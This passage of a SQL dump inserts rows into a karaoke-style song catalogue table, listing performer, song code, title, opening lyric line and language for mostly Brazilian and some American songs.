4076, 'ELA É DEMAIS', 'Ela tem um jeito lindo de me olhar nos', 'BRA'), (978, 'Sandy e Júnior-Toquinho', 4077, 'ERA UMA VEZ', 'Era uma vez, um lugarzinho no meio do nada', 'BRA'), (979, 'Alcione-Alexandre Pires', 4079, 'ESTRANHA LOUCURA', 'Minha estranha loucura', 'BRA'), (980, 'Tunai', 4082, 'FRISSON', 'Meu coração pulou você chegou me deixou', 'BRA'), (981, 'Djavan', 4096, 'SAMURAI', 'Ah! Quanto querer cabe em meu coração', 'BRA'), (982, 'Roberto Carlos', 4100, 'VOCÊ NÃO SERVE PRA MIM', 'Não fique triste não se zangue', 'BRA'), (983, 'Jane Duboc', 4103, 'CHAMA DA PAIXÃO', 'Tanto tempo tentando te...', 'BRA'), (984, 'Milionário e José Rico', 4110, 'ESTRADA DA VIDA', 'Nesta longa estrada da vida', 'BRA'), (985, 'Reginaldo Rossi', 4114, 'GARÇOM', 'Garçom, aqui nesta mesa de bar', 'BRA'), (986, 'Titãs', 4116, 'INSENSÍVEL', 'Até parece loucura não sei explicar', 'BRA'), (987, 'Caetano Veloso', 4134, 'SOZINHO', 'Às vezes no silêncio da noite', 'BRA'), (988, 'Roberto Carlos', 4139, 'VÊ SE VOLTA PRA MIM', 'Deixa que eu me acerte com o seu coração', 'BRA'), (989, 'Dalva de Oliveira', 4144, 'BANDEIRA BRANCA', 'Bandeira branca amor não...', 'BRA'), (990, 'Roberto Carlos', 4149, 'CAVALGADA', 'Vou cavalgar por toda a noite', 'BRA'), (991, 'Rionegro e Solimões', 4151, 'DE SÃO PAULO A BELÉM', 'Deu um arroxo no peito eu fiquei', 'BRA'), (992, 'Zé Ramalho', 4154, 'ENTRE A SERPENTE E A ESTRELA', 'Há um brilho de faca onde o amor', 'BRA'), (993, 'Caetano Veloso', 4159, 'LUA E ESTRELA', 'Menina do anel de lua e estrela', 'BRA'), (994, 'Adriana Calcanhoto', 4161, 'MENTIRAS', 'Nada ficou no lugar ...', 'BRA'), (995, 'Legião Urbana', 4168, 'POR ENQUANTO', 'Mudaram as estações e nada...', 'BRA'), (996, 'Daniel', 4169, 'PRA FALAR A VERDADE', 'Um amigo me falou a poeira...', 'BRA'), (997, 'Ney Matogrosso', 4175, 'SANGUE LATINO', 'Jurei mentiras e sigo sozinho...', 'BRA'), (998, 'Nana Caymmi', 4178, 'SUAVE VENENO', 'Vive encantado de amor...', 'BRA'), (999, 'Elis Regina', 4182, 'CASA NO CAMPO', 'Eu quero uma casa no campo', 'BRA'), (1000, 'Sérgio Reis', 4184, 'CHALANA', 'Lá vai a chalana bem longe se vai', 'BRA'), (1001, 'Maria Creuza', 4191, 'EU SEI QUE VOU TE AMAR', 'Eu sei que vou te amar', 'BRA'), (1002, 'Roberto Carlos', 4209, 'PROPOSTA', 'Eu te proponho nós nos amarmos', 'BRA'), (1003, 'Angélica', 4217, 'TERRA DO NUNCA', 'Lápis de cor, bicicleta, bom bom', 'BRA'), (1004, 'Roupa Nova', 4218, 'TÍMIDA', 'Lábios com sabor de hortelã...', 'BRA'), (1005, 'Leonardo', 4229, 'CANÇÃO DO TERCEIRO MILÊNIO', 'Meu Deus eu te peço durante a passagem', 'BRA'), (1006, 'Nelson Gonçalves', 4235, 'FICA COMIGO ESTA NOITE', 'Fica comigo esta noite...', 'BRA'), (1007, 'Luiz Melodia', 4247, 'PÉROLA NEGRA', 'Tente passar pelo que estou passando', 'BRA'), (1008, 'Sérgio Reis', 4257, 'TOCANDO EM FRENTE', 'Ando devagar porque já tive pressa', 'BRA'), (1009, 'Rionegro e Solimões', 4261, 'A GENTE SE ENTREGA', 'Uma dose de saudade misturada com', 'BRA'), (1010, 'Roberto Carlos', 4270, 'EU TE DAREI O CÉU', 'Eu te darei o céu meu bem', 'BRA'), (1011, 'Quarteto em CY-MPB4', 4271, 'FALANDO DE AMOR', 'Se eu pudesse por um dia esse amor e', 'BRA'), (1012, 'Leonardo', 4278, 'MANO', 'Mano você é meu sangue mais que um', 'BRA'), (1013, 'Raimundos', 4283, 'MULHER DE FASES', 'Que mulher ruim jogou minhas coisas fora', 'BRA'), (1014, 'Caetano Veloso', 4286, 'O LEÃOZINHO', 'Gosto muito de te ver leãozinho', 'BRA'), (1015, 'Gilberto Gil', 4288, 'PALCO', 'Uá pá pá pá... Subo nesse...', 'BRA'), (1016, 'Zezé Di Camargo e Luciano', 4289, 'PARE', 'Pare até quando você quer', 'BRA'), (1017, 'Charlie Brown Jr.', 4291, 'PROIBIDA PRA MIM', 'Ela achou o meu cabelo engraçado', 'BRA'), (1018, 'Secos e Molhados', 4293, 'ROSA DE HIROSHIMA', 'Pensem nas crianças mudas telepáticas', 'BRA'), (1019, 'Leandro e Leonardo', 4294, 'RUMO A GOIÂNIA', 'É noite o carro está rugindo...', 'BRA'), (1020, 'Rionegro e Solimões', 4312, 'FALTA VOCÊ', 'O dia vai se acabando a tarde vai se', 'BRA'), (1021, 'Fábio Jr.', 4313, 'FELICIDADE', 'Um jeito, um gesto envolto de ternura', 'BRA'), (1022, 'Paulinho da Viola', 4315, 'FOI UM RIO QUE PASSOU EM MINHA VIDA', 'Se um dia meu coração...', 'BRA'), (1023, 'Ana Carolina', 4316, 'GARGANTA', 'Minha garganta estranha quando não te', 'BRA'), (1024, 'Sandy e Júnior', 4317, 'IMORTAL (IMMORTALITY)', 'É bem assim que estou é tudo que restou', 'BRA'), (1025, 'Chico Buarque-Nara Leão', 4319, 'JOÃO E MARIA', 'Agora eu era o herói', 'BRA'), (1026, 'Elis Regina', 4326, 'O MESTRE-SALA DOS MARES', 'Há muito tempo nas águas da Guanabara', 'BRA'), (1027, 'Sérgio Reis', 4331, 'PINGA NI MIM', 'Nesta casa tem goteira pinga ni mim', 'BRA'), (1028, 'Daniel', 4338, 'VAI DAR SAMBA', 'Gosto e isso não é nenhum segredo', 'BRA'), (1029, 'Charlie Brown Jr.', 4340, 'ZÓIO DE LULA', 'Tirou a roupa entrou no mar', 'BRA'), (1030, 'Djavan', 4343, 'AÇAÍ', 'Solidão de manhã poeira tomando', 'BRA'), (1031, 'Chitãozinho e Xororó', 4345, 'ALÔ', 'Alô tô ligando pra saber como você e', 'BRA'), (1032, 'Los Hermanos', 4346, 'ANNA JÚLIA', 'Quem te vê passar assim por mim', 'BRA'), (1033, 'Sandy e Júnior', 4347, 'AS QUATRO ESTAÇÕES', 'A noite cai o frio desce', 'BRA'), (1034, 'Nilton César', 4350, 'FÉRIAS NA ÍNDIA', 'À Índia fui em férias passear', 'BRA'), (1035, 'Bala, Bombom e Chocolate', 4351, 'FISSURAS DE UM CASAL', 'Hoje eu acordei e ouvi a nossa canção', 'BRA'), (1036, 'Roberto Carlos', 4352, 'FORÇA ESTRANHA', 'Eu vi um menino correndo eu vi o tem', 'BRA'), (1037, 'Legião Urbana', 4355, 'HOJE A NOITE NÃO TEM LUAR', 'Ela passou do meu lado...', 'BRA'), (1038, 'Leonardo', 4360, 'MENTIRA QUE VIROU PAIXÃO', 'Tinha que ser você mas o destino não', 'BRA'), (1039, 'Rosana', 4366, 'O AMOR E O PODER', 'A música na sombra o ritmo no ar', 'BRA'), (1040, 'Luiz Gonzaga', 4367, 'OVO DE CODORNA', 'Eu quero ovo de codorna pra comer', 'BRA'), (1041, 'Barão Vermelho', 4369, 'POR VOCÊ', 'Por você eu dançaria tango no teto', 'BRA'), (1042, 'Agnaldo Timóteo', 4370, 'QUEM É', 'Quem é que não sofre por alguém', 'BRA'), (1043, 'Baby do Brasil (Baby Consuelo)', 4372, 'SEM PECADO E SEM JUÍZO', 'Dia após dia começo a encontrar', 'BRA'), (1044, 'Zezé Di Camargo e Luciano', 4373, 'SERÁ QUE FOI SAUDADE', 'Diga logo o que te trouxe aqui', 'BRA'), (1045, 'Antônio Marcos', 4376, 'SONHOS DE UM PALHAÇO', 'Vejam só que história boba...', 'BRA'), (1046, 'IRA!', 4377, 'TEOREMA', 'Não vá embora fique um pouco...', 'BRA'), (1047, 'Almir Sater', 4379, 'UM VIOLEIRO TOCA', 'Quando uma estrela cai no escurão da', 'BRA'), (1048, 'Golden Boys', 4384, 'ALGUÉM NA MULTIDÃO', 'Se você perdeu um amor como...', 'BRA'), (1049, 'Sandy e Júnior', 4387, 'APRENDER A AMAR', 'Ô uô ô ô... Tenho um segredo pra contar', 'BRA'), (1050, 'Rionegro e Solimões', 4389, 'BATE O PÉ', 'Alô galera bate a mão e bate o pé', 'BRA'), (1051, 'Cazuza', 4390, 'BRASIL', 'Não me convidaram pra esta festa pobre', 'BRA'), (1052, 'Trio Esperança', 4394, 'FILME TRISTE', 'Filme triste que me fez chorar', 'BRA'), (1053, 'Kid Abelha', 4397, 'LÁGRIMAS E CHUVA', 'Eu perco o sono e choro...', 'BRA'), (1054, 'Lairton e Seus Teclados', 4400, 'MORANGO DO NORDESTE', 'Estava tão tristonho quando...', 'BRA'), (1055, 'Gian e Giovani', 4405, 'NEM DORMINDO CONSIGO TE ESQUECER', 'Não é fácil ficar sem você...', 'BRA'), (1056, 'Los Hermanos', 4408, 'PRIMAVERA', 'Primavera se foi e com ela meu amor', 'BRA'), (1057, 'Caetano Veloso', 4409, 'QUALQUER COISA', 'Esse papo já tá qualquer coisa', 'BRA'), (1058, 'Elis Regina', 4415, 'UPA NEGUINHO', 'Upa neguinho na estrada upa pra lá e', 'BRA'), (1059, 'Chico Buarque', 4416, 'VAI PASSAR', 'Vai passar nessa avenida um samba', 'BRA'), (1060, 'Roberto Carlos', 4421, 'A GUERRA DOS MENINOS', 'Hoje eu tive um sonho que foi o mais', 'BRA'), (1061, 'Titãs', 4423, 'ALUGA-SE', 'A solução pro nosso povo eu vou dar', 'BRA'), (1062, 'Marisa Monte', 4424, 'AMOR I LOVE YOU', 'Deixa eu dizer que te amo', 'BRA'), (1063, 'Fafá de Belém', 4430, 'CORAÇÃO DO AGRESTE', 'Regressar é reunir Dois lados', 'BRA'), (1064, 'Ivan Lins', 4434, 'DEPENDE DE NÓS', 'Depende de nós...', 'BRA'), (1065, 'Rionegro e Solimões', 4439, 'FRIO DA MADRUGADA', 'Sei que você quer voltar Quem sou eu pra', 'BRA'), (1066, 'RPM', 4440, 'LOURAS GELADAS', 'Disfarça e faz que nem me viu', 'BRA'), (1067, 'Daniel', 4455, 'QUE ERA EU', 'Um dia você vai procurar por mim', 'BRA'), (1068, 'Ivete Sangalo', 4457, 'SE EU NÃO TE AMASSE TANTO ASSIM', 'Meu coração sem direção...', 'BRA'), (1069, 'Cauby Peixoto', 4468, 'CONCEIÇÃO', 'Conceição eu me lembro Muito bem', 'BRA'), (1070, 'Roberto Carlos', 4469, 'CUSTE O QUE CUSTAR', 'Já nem sei dizer Se sou feliz ou não', 'BRA'), (1071, 'Zezé Di Camargo e Luciano', 4470, 'DA BOCA PRA FORA', 'Pode tudo se perder Posso até enlouquecer', 'BRA'), (1072, 'Verônica Sabino', 4472, 'DEMAIS', 'Foi um vento que passou Que te trouxe', 'BRA'), (1073, 'Gilberto Gil', 4473, 'ESPERANDO NA JANELA', 'Ainda me lembro Do seu...', 'BRA'), (1074, 'Moacyr Franco', 4474, 'EU TE DAREI BEM MAIS', 'Pelo menos desta vez', 'BRA'), (1075, 'Sérgio Reis', 4477, 'FILHO ADOTIVO', 'Com sacrifício eu criei meus sete filhos', 'BRA'), (1076, 'Martinho da Vila', 4481, 'MADALENA DO JUCU', 'Madalena Madalena Você é meu bem que', 'BRA'), (1077, 'Tonico e Tinoco', 4483, 'MORENINHA LINDA', 'Meu coração tá pisado', 'BRA'), (1078, 'Rodrigo Faro', 4484, 'NÃO DIGA NADA', 'Olha pra mim Não diga nada', 'BRA'), (1079, 'Marisa Monte', 4487, 'O QUE ME IMPORTA', 'O que me importa Seu carinho agora', 'BRA'), (1080, 'Sandy e Júnior', 4488, 'OLHA O QUE O AMOR ME FAZ', 'Meu coração bate Ligeiramente apertado', 'BRA'), (1081, 'Leonardo', 4494, 'QUERO COLO', 'Quem é que garante Que não vou chorar', 'BRA'), (1082, 'Gal Costa', 4500, 'VAPOR BARATO', 'Oh sim Eu estou tão cansado...', 'BRA'), (1083, 'Paul Anka', 4509, 'DIANA', 'I''m so young and you''re so old this my darling', 'EUA'), (1084, 'Madonna', 4535, 'LIKE A VIRGIN', 'I made it through the wilderness', 'EUA'), (1085, 'Eric Clapton', 4608, 'TEARS IN HEAVEN', 'Would you know my name if I saw you in', 'EUA'), (1086, 'Elton John', 4768, 'SKYLINE PIGEON', 'Turn me loose from your hands', 'EUA'), (1087, 'Elvis Presley', 4779, 'SUSPICIOUS MINDS', 'We''re caught in a trap I can''t walk out', 'EUA'), (1088, 'Shania Twain-Back Street Boys', 4822, 'FROM THIS MOMENT ON', 'From this moment life has begun', 'EUA'), (1089, 'Madonna', 4830, 'LIKE A PRAYER', 'Life is a mystery everyone must stand alone', 'EUA'), (1090, 'Queen', 4937, 'LOVE OF MY LIFE', 'Love of my life, you''ve hurt me', 'EUA'), (1091, 'Sandy e Júnior', 6002, 'A LENDA', 'Bem lá no céu Uma lua existe', 'BRA'), (1092, 'Skank', 6006, 'BALADA DO AMOR INABALÁVEL', 'Leva essa canção de Amor dançante pra', 'BRA'), (1093, 'Maria Creuza-Toquinho-Viníciusde Moraes', 6020, 'MINHA NAMORADA', 'Meu poeta eu hoje Estou contente', 'BRA'), (1094, 'Roberto Carlos', 6023, 'O CALHAMBEQUE', 'Essa é uma das muitas histórias...', 'BRA'), (1095, 'Capital Inicial-Kiko Zambianchi', 6028, 'PRIMEIROS ERROS', 'Meu caminho é cada manhã', 'BRA'), (1096, 'Daniel', 6029, 'QUANDO O CORAÇÃO SE APAIXONA', 'Quando o coração Da gente se apaixona', 'BRA'), (1097, 'Trio Esperança', 6042, 'A FESTA DO BOLINHA', 'Eu ontem fui à festa na casa do Bolinha', 'BRA'), (1098, 'Elis Regina', 6051, 'CARTOMANTE', 'Nos dias de hoje é bom que ...', 'BRA'), (1099, 'Nelson Gonçalves', 6054, 'CHÃO DE ESTRELAS', 'Minha vida era um palco iluminado', 'BRA'), (1100, 'IRA!', 6056, 'ENVELHEÇO NA CIDADE', 'Mais um ano que se passa mais...', 'BRA'), (1101, 'Hino do Flamengo', 6063, 'HINO DO FLAMENGO', 'Uma vez Flamengo sempre...', 'BRA'), (1102, 'Zeca Pagodinho', 6064, 'JURA', 'Jura jura jura pelo Senhor', 'BRA'), (1103, 'Wanessa Camargo', 6070, 'O AMOR NÃO DEIXA', 'O que fazer quando um querer', 'BRA'), (1104, '14 Bis', 6074, 'PLANETA SONHO', 'Aqui ninguém mais ficará de...', 'BRA'), (1105, 'Ivete Sangalo', 6081, 'A LUA Q EU T DEI', 'Posso te falar dos sonhos...', 'BRA'), (1106, 'Wanessa Camargo', 6083, 'APAIXONADA POR VOCÊ', 'Você chegou e eu descobri a paixão', 'BRA'), (1107, 'Lulu Santos', 6084, 'APENAS MAIS UMA DE AMOR', 'Eu gosto tanto de você que até prefiro', 'BRA'), (1108, 'Roberto Carlos', 6085, 'AS CURVAS DA ESTRADA DE SANTOS', 'Se você pretende saber quem eu sou', 'BRA'), (1109, 'Gonzaguinha', 6094, 'É', 'É a gente quer valer o nosso...', 'BRA'), (1110, 'Elba Ramalho', 6095, 'ENTRE O CÉU E O MAR', 'Quantos labirintos tem meu ...', 'BRA'), (1111, 'Hermes Aquino', 6104, 'NUVEM PASSAGEIRA', 'Eu sou nuvem passageira que...', 'BRA'), (1112, 'Ana Carolina', 6109, 'QUEM DE NÓS DOIS', 'Eu e você não é assim tão complicado não é', 'BRA'), (1113, 'Rastapé', 6123, 'COLO DE MENINA', 'A lua quando brilha falo de amor', 'BRA'), (1114, 'Roupa Nova', 6125, 'CORAÇÃO PIRATA', 'Na na iê... O meu coração pirata toma tudo', 'BRA'), (1115, 'Zezé Di Camargo e Luciano', 6129, 'DOU A VIDA POR UM BEIJO', 'Difícil demais de amar assim minha timidez', 'BRA'), (1116, 'Daniel', 6130, 'EMBRIAGADO DE AMOR', 'Eu pensei que a minha base...', 'BRA'); INSERT INTO `tb_lista_principal` (`idListaPrincipal`, `interprete`, `codigo`, `titulo`, `inicio`, `idioma`) VALUES (1117, 'Cláudia Telles', 6134, 'FIM DE TARDE', 'Hoje eu sinto tanto não ter você e nem o tempo', 'BRA'), (1118, 'Ednardo', 6151, 'PAVÃO MYSTERIOZO', 'Pavão Mysteriozo pássaro formoso', 'BRA'), (1119, 'Tim Maia', 6153, 'PUDERA', 'Pudera te encontrar aqui pudera este lugar', 'BRA'), (1120, 'Rionegro e Solimões', 6154, 'SÓ ALEGRIA', 'Hoje o meu coração tá a fim de emoção', 'BRA'), (1121, 'Leonardo', 6157, 'TODAS AS COISAS DO MUNDO', 'Não adianta te dar todas as coisas do', 'BRA'), (1122, 'Joanna', 6162, 'A PADROEIRA', 'Ó Virgem Santa rogai por nós...', 'BRA'), (1123, 'Zizi Possi', 6163, 'A PAZ', 'A paz invadindo meu coração de repente me', 'BRA'), (1124, 'Eduardo Dusek', 6167, 'BARRADOS NO BAILE', 'Uapa pararu rara... Ela num macacão de', 'BRA'), (1125, 'Ivete Sangalo', 6169, 'BUG BUG BYE BYE', 'Não quero mais esse amor no...', 'BRA'), (1126, 'Chitãozinho e Xororó-R.McEntire', 6170, 'CORAÇÃO VAZIO', 'Lá fora a chuva cai e o que acontece', 'BRA'), (1127, 'IRA!', 6171, 'DIAS DE LUTA', 'Só depois de muito tempo fui...', 'BRA'), (1128, 'Jota Quest', 6172, 'DIAS MELHORES', 'Vivemos esperando dias...', 'BRA'), (1129, 'Bruno e Marrone', 6173, 'DORMI NA PRAÇA (VERSÃO ACÚSTICA)', 'Caminhei sozinho pela rua falei com as', 'BRA'), (1130, 'Caetano Veloso', 6174, 'DRÃO', 'Drão o amor da gente é como um grão', 'BRA'), (1131, 'Sandy e Júnior', 6176, 'ENROSCA', 'Enrosca o meu pescoço dá um beijo no meu', 'BRA'), (1132, 'Wanessa Camargo', 6178, 'EU POSSO TE SENTIR', 'Quando eu sinto a mágica do amor no', 'BRA'), (1133, 'Titãs', 6180, 'HOMEM PRIMATA', 'Desde os primórdios até hoje em dia', 'BRA'), (1134, 'Rionegro e Solimões', 6181, 'LENHA', 'Eu não sei dizer o que quer dizer o que eu vou', 'BRA'), (1135, 'Marisa Monte', 6190, 'PANIS ET CIRCENSES', 'Eu quis cantar minha canção iluminada de sol', 'BRA'), (1136, 'Fábio Jr.-Bonnie Tyler', 6193, 'SEM LIMITES PRA SONHAR', 'Há uma chance da gente se encontrar', 'BRA'), (1137, 'Silvinha', 6195, 'SPLISH SPLASH', 'Splish splash fez o beijo que eu dei', 'BRA'), (1138, 'Gilberto Gil', 6196, 'SUPER-HOMEM (A CANÇÃO)', 'Um dia vivi a ilusão de que ser...', 'BRA'), (1139, '14 Bis', 6197, 'TODO AZUL DO MAR', 'Foi assim como ver o mar a ...', 'BRA'), (1140, 'Paralamas do Sucesso', 6199, 'VITAL E SUA MOTO', 'Vital andava a pé e achava que assim estava', 'BRA'), (1141, 'Skank', 6202, 'ACIMA DO SOL', 'Assim ela já vai achar o cara que lhe queira', 'BRA'), (1142, 'Roberto Carlos', 6209, 'CAMA E MESA', 'Eu quero ser sua canção eu quero ser', 'BRA'), (1143, 'Pato Fú', 6210, 'CANÇÃO PRA VOCÊ VIVER MAIS', 'Nunca pensei um dia chegar e te ouvir dizer', 'BRA'), (1144, 'Renato e Seus Blue Caps', 6211, 'COISA LINDA (FECHE OS OLHOS)', 'Feche os olhos e sinta um beijinho agora', 'BRA'), (1145, 'Rita Lee', 6212, 'COR-DE-ROSA CHOQUE', 'As duas faces de Eva a Bela e a Fera', 'BRA'), (1146, 'Titãs', 6220, 'FLORES', 'Olhei até ficar cansado de ver os meus olhos', 'BRA'), (1147, 'Lara Fabian', 6222, 'MEU GRANDE AMOR', 'Eu sonhei e esperei por seu...', 'BRA'), (1148, 'Simone', 6227, 'O AMANHÃ', 'A cigana leu o meu destino eu sonhei bola', 'BRA'), (1149, 'Sandy e Júnior', 6228, 'O AMOR FAZ', 'Eu ficava olhando as estrelas e fazia um', 'BRA'), (1150, 'Cazuza', 6230, 'O TEMPO NÃO PÁRA', 'Desperto contra o sol sou forte sou', 'BRA'), (1151, 'O Rappa', 6231, 'PESCADOR DE ILUSÕES', 'Se meus joelhos não doessem mais', 'BRA'), (1152, 'Joanna', 6235, 'RECADO', 'Mandei um recado pro meu...', 'BRA'), (1153, 'Falamansa', 6240, 'XOTE DA ALEGRIA', 'Se um dia alguém mandou ser o que sou e o', 'BRA'), (1154, 'Titãs', 6243, 'A MELHOR BANDA DE TODOS OS TEMPOS', 'Quinze minutos de fama mais um pros', 'BRA'), (1155, 'Alexandre Pires', 6251, 'É POR AMOR', 'A noite de lua cheia é quase imprescindível', 'BRA'), (1156, 'Cogumelo Plutão', 6253, 'ESPERANDO NA JANELA', 'Tchu tchurururu... Quando me perdi você', 'BRA'), (1157, 'Wanessa Camargo', 6254, 'EU QUERO SER O SEU AMOR', 'Na nana... Tá na hora de assumir o que existe', 'BRA'), (1158, 'Ivete Sangalo', 6256, 'FESTA', 'Festa no gueto pode vir pode...', 'BRA'), (1159, 'Chitãozinho e Xororó-Roupa Nova', 6258, 'FRIO DA SOLIDÃO (DON''T LET ME DOWN)', 'Quero entender porque razão tudo acabou', 'BRA'), (1160, 'Legião Urbana', 6262, 'LOVE IN THE AFTERNOON', 'É tão estranho os bons...', 'BRA'), (1161, 'Milionário e José Rico', 6272, 'QUEM DISSE QUE ESQUECI', 'Quem disse que esqueci se tudo por aqui', 'BRA'), (1162, 'Roupa Nova', 6273, 'SAPATO VELHO', 'Você lembra lembra daquele tempo eu tinha', 'BRA'), (1163, 'Daniel', 6275, 'SÓ SEU AMOR NÃO VAI EMBORA', 'Todas as lembranças suas eu desfiz', 'BRA'), (1164, 'Altemar Dutra', 6277, 'SOMOS IGUAIS', 'Acabei de saber que você riu de mim', 'BRA'), (1165, 'Caetano Veloso', 6278, 'SOY LOCO POR TI AMERICA', 'Soy loco por ti America yo voy traer una', 'BRA'), (1166, 'Marisa Monte', 6283, 'A SUA', 'Eu só quero que você saiba que eu estou', 'BRA'), (1167, 'KLB', 6293, 'EU NUNCA TE ESQUECI', 'De novo vem a noite e eu...', 'BRA'), (1168, 'Sandy e Júnior', 6301, 'NÃO DÁ PRA NÃO PENSAR', 'Não dá pra não pensar em você tá cada vez', 'BRA'), (1169, 'Alexandre Pires', 6302, 'NECESSIDADE', 'Beijar tua boca é a minha aventura', 'BRA'), (1170, 'Agnaldo Rayol', 6303, 'O PRINCÍPIO E O FIM', 'A minha vida em carinhos darei por toda uma', 'BRA'), (1171, 'Caetano Veloso', 6305, 'PODRES PODERES', 'Enquanto os homens exercem seus podres', 'BRA'), (1172, 'Benito Di Paula', 6310, 'RETALHOS DE CETIM', 'Ensaiei meu samba o ano inteiro comprei surdo', 'BRA'), (1173, 'Roberto Carlos', 6316, 'TODOS ESTÃO SURDOS', 'La larara la la... Desde o começo do mundo', 'BRA'), (1174, 'Daniel', 6318, 'UM BEIJO PRA ME ENLOUQUECER', 'Às vezes perto de você eu...', 'BRA'), (1175, 'Legião Urbana', 6324, 'ANDREA DORIA', 'Às vezes parecia que de...', 'BRA'), (1176, 'Kelly Key', 6325, 'BABA', 'Coitado... Você não acreditou...', 'BRA'), (1177, 'Roberto Carlos', 6329, 'E POR ISSO ESTOU AQUI', 'Olha dentro dos meus olhos vê quanta tristeza', 'BRA'), (1178, 'Titãs', 6330, 'EPITÁFIO', 'Devia ter amado mais ter chorado mais', 'BRA'), (1179, 'IRA!', 6332, 'FLORES EM VOCÊ', 'De todo o meu passado boas e...', 'BRA'), (1180, 'Sandra de Sá', 6334, 'JOGA FORA', 'É cansei já não dá mais você pisou demais', 'BRA'), (1181, 'Markinhos Moura', 6335, 'MEU MEL', 'Fica comigo meu mel tire o adeus das mãos', 'BRA'), (1182, 'O Rappa', 6337, 'MINHA ALMA (A PAZ QUE EU NÃO QUERO)', 'A minha alma tá armada e apontada para cara', 'BRA'), (1183, 'Daniela Mercury', 6339, 'MUTANTE', 'Kiss me baby... Juro que não vai doer', 'BRA'), (1184, 'Kid Abelha', 6340, 'NADA TANTO ASSIM', 'Só tenho tempo pras...', 'BRA'), (1185, 'Cássia Eller', 6343, 'O SEGUNDO SOL', 'Quando o segundo sol chegar para realinhar as', 'BRA'), (1186, 'Marisa Monte', 6344, 'ONTEM AO LUAR', 'Ontem ao luar nós dois em plena solidão tu me', 'BRA'), (1187, 'Antônio Marcos', 6351, 'SE EU PUDESSE CONVERSAR COM DEUS', 'Eu hoje estou tão triste eu precisava tanto', 'BRA'), (1188, 'Fábio Jr.', 6354, 'SEM PESO E SEM MEDIDA', 'Quando a noite desce com um beijo', 'BRA'), (1189, 'Tim Maia', 6356, 'SOSSEGO', 'Ora bolas não me amole com esse papo de', 'BRA'), (1190, 'Wanessa Camargo', 6357, 'TANTA SAUDADE', 'Eu nunca fui do tipo que se apaixona', 'BRA'), (1191, 'KLB', 6359, 'TE AMAR AINDA MAIS', 'Pra que se esconder se...', 'BRA'), (1192, 'Matogrosso e Mathias', 6366, 'DE IGUAL PRA IGUAL', 'Você mentiu quando jurava para mim quando', 'BRA'), (1193, 'Zeca Pagodinho', 6367, 'DEIXA A VIDA ME LEVAR', 'Eu já passei por quase tudo nessa vida', 'BRA'), (1194, 'Rinaldo-Liriel', 6371, 'EU NUNCA MAIS VOU TE ESQUECER', 'Se eu tivesse o coração que dei', 'BRA'), (1195, 'Marisa Monte', 6377, 'LENDA DAS SEREIAS RAINHA DO MAR', 'Oguntê Marabô Caiala e Sobá', 'BRA'), (1196, 'Placa Luminosa', 6379, 'MAIS UMA VEZ', 'Telefono te procuro mil loucuras pra poder te', 'BRA'), (1197, 'Zezé Di Camargo e Luciano', 6381, 'MENINO CANTADOR', 'Sou menino cantador que só quer falar', 'BRA'), (1198, 'Roberto Carlos', 6387, 'SUA ESTUPIDEZ', 'Meu bem meu bem você tem que acreditar em', 'BRA'), (1199, 'Skank', 6388, 'TANTO', 'Coveiros gemem tristes ais e realejos', 'BRA'), (1200, 'Marlon e Maicon', 6390, 'TE PEÇO FICA COMIGO', 'Escuta meu amor faz tanto tempo que eu', 'BRA'), (1201, 'Chitãozinho e Xororó', 6396, 'UM SONHO DE AMOR', 'De onde vem esse amor tão intenso', 'BRA'), (1202, 'Ricardo Braga', 6397, 'UMA ESTRELA VAI BRILHAR', 'Uma estrela vai brilhar no meu caminho', 'BRA'), (1203, 'Sandy e Júnior', 6398, 'VAMO PULÁ', 'Estou sentindo solta pelo ar uma energia que', 'BRA'), (1204, 'Gino e Geno', 6412, 'ELA CHOROU DE AMOR', 'Ela sentiu saudade ela me...', 'BRA'), (1205, 'Beto Guedes', 6420, 'MARIA SOLIDÁRIA', 'Eu choro de cara suja meu papagaio o vento', 'BRA'), (1206, 'Orlando Silva', 6424, 'NADA ALÉM', 'Nada além nada além de uma ilusão', 'BRA'), (1207, 'Cláudio Zoli', 6427, 'NOITE DO PRAZER', 'A noite vai ser boa de tudo vai rolar vai rolar', 'BRA'), (1208, 'Sandy e Júnior', 6428, 'O AMOR NOS GUIARÁ', 'Vamos ter momentos a chorar nós vamos ter', 'BRA'), (1209, 'Cássia Eller', 6429, 'O MEU MUNDO FICARIA COMPLETO (COM VOCÊ)', 'Não é porque eu sujei a roupa bem agora que', 'BRA'), (1210, 'Luan e Vanessa', 6432, 'QUATRO SEMANAS DE AMOR', 'Foi um sonho de verão numa praia', 'BRA'), (1211, 'Chico Buarque', 6433, 'RODA VIVA', 'Tem dias que a gente se sente como quem', 'BRA'), (1212, 'Biafra (Byafra)', 6435, 'SONHO DE ÍCARO', 'Voar voar subir subir ir por onde for', 'BRA'), (1213, 'Caetano Veloso', 6439, 'TRILHOS URBANOS', 'O melhor o tempo esconde longe muito longe', 'BRA'), (1214, 'RPM', 6440, 'VIDA REAL', 'Se você pudesse me dizer se você soubesse', 'BRA'), (1215, 'Alexandre Pires', 6443, 'A MUSA DAS MINHAS CANÇÕES', 'No palco de um pequeno bar eu nunca imaginei', 'BRA'), (1216, 'Dallas Company', 6451, 'CLIMA DE RODEIO', 'A magia está no ar vejo fogo na arena', 'BRA'), (1217, 'Jorge Vercilo', 6473, 'QUE NEM MARÉ', 'Faz um tempão que eu não...', 'BRA'), (1218, 'Frejat', 6474, 'SEGREDOS', 'Eu procuro um amor que ainda não encontrei', 'BRA'), (1219, 'Edson e Hudson', 6485, 'AZUL', 'Foi na manhã em que eu te encontrei', 'BRA'), (1220, 'Jota Quest', 6509, 'SÓ HOJE', 'Hoje eu preciso te encontrar...', 'BRA'), (1221, 'Jorge Vercilo', 6536, 'FÊNIX', 'Eu prisioneiro meu descobri...', 'BRA'), (1222, 'Tim Maia', 6548, 'PRIMAVERA (VERSÃO ESTÚDIO)', 'Quando o inverno chegar...', 'BRA'), (1223, 'Fábio Jr.', 6567, 'EM CADA AMANHECER', 'Quando a noite traz o silêncio estou sozinho', 'BRA'), (1224, 'Rouge', 6639, 'UM ANJO VEIO ME FALAR', 'Tão difícil entender o coração', 'BRA'), (1225, 'Alexandre Pires', 6640, 'VEM ME AMAR (AMAME)', 'Vem aqui doce amor me ajuda a mudar esse', 'BRA'), (1226, 'Alexandre Pires', 6649, 'BUM, BUM, BUM', 'Amiga olha só como mudou ...', 'BRA'), (1227, 'Fábio Jr.', 6661, 'MINHA OUTRA METADE', 'Sabe eu vou tentar de novo', 'BRA'), (1228, 'Ana Carolina', 6694, 'ENCOSTAR NA TUA', 'Eu quero te roubar pra mim', 'BRA'), (1229, 'Matogrosso e Mathias', 6717, 'TENTEI TE ESQUECER', 'Ah como quero te encontrar novamente', 